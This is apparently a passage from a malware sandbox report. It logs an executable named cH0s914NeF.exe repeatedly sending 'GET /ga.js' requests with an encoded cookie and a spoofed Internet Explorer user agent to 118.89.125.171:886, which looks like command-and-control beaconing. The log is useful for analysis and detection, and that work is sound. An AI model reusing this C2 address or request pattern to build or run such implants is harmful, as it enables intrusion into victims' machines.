Apr 20, 2024 15:23:30.261214018 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:30.579246998 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	49831	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:31.053982973 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:31.369587898 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	49832	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:31.839359999 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:32.171638966 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	49833	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:32.603632927 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:32.922768116 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	49834	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:33.366568089 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:33.697776079 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	49835	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:34.132750988 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:34.452891111 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	49836	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:35.895677090 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:36.214260101 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	49837	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:36.691328049 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:37.011251926 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	49838	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:37.452873945 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:37.777656078 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	49839	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:38.220113039 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:38.549314022 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	49840	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:38.978763103 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:39.315681934 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	49841	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:39.761579990 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:40.101829052 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	49842	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:40.536361933 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:40.844254017 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	49843	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:41.282506943 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:41.604232073 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	49844	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:42.066878080 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:42.381027937 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	49845	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:42.833945990 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:43.164864063 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	49846	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:43.617100000 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:43.941934109 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	49847	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:44.358628035 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:44.667675972 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.5	49848	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:45.122040033 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:45.457865953 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.5	49849	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:45.888824940 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:46.213836908 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.5	49850	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:46.675436020 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:47.039983988 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.5	49851	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:47.990454912 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:48.307499886 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	49852	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:48.746864080 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:49.069642067 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	49853	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:49.508625984 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:49.826461077 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.5	49854	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:50.246809006 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:50.551213026 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.5	49855	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:51.035669088 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:51.382921934 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.5	49856	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:51.820933104 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:52.138253927 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.5	49857	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:52.569936991 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:52.888459921 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.5	49858	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
